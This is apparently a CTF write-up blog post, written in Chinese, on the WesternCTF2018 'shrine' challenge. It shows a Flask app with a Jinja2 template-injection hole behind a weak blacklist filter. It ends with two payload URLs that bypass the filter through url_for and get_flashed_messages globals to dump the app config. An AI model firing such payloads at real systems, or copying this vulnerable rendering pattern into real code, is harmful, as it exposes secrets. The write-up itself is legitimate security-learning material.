[WesternCTF2018]shrine

baozongwi Lv5
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
app.run(debug=True)

拿到源码之后很明显的SSTI漏洞

但是这里貌似是一个新姿势,需要了解一些知识就是

为了获取讯息,我们需要读取一些例如current_app这样的全局变量。

看了其他师傅的WP,python的沙箱逃逸这里的方法是利用python对象之间的引用关系来调用被禁用的函数对象

这里有两个函数包含了current_app全局变量,url_forget_flashed_messages

app.config就可以直接的查阅配置信息

1
2
3
/shrine/name={{get_flashed_messages.__globals__['current_app'].config}}

/shrine/name={{url_for.__globals__['current_app'].config}}
  • Title: [WesternCTF2018]shrine
  • Author: baozongwi
  • Created at : 2024-08-31 15:13:28
  • Updated at : 2024-09-14 15:48:16
  • Link: https://baozongwi.xyz/2024/08/31/WesternCTF2018-shrine/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
[WesternCTF2018]shrine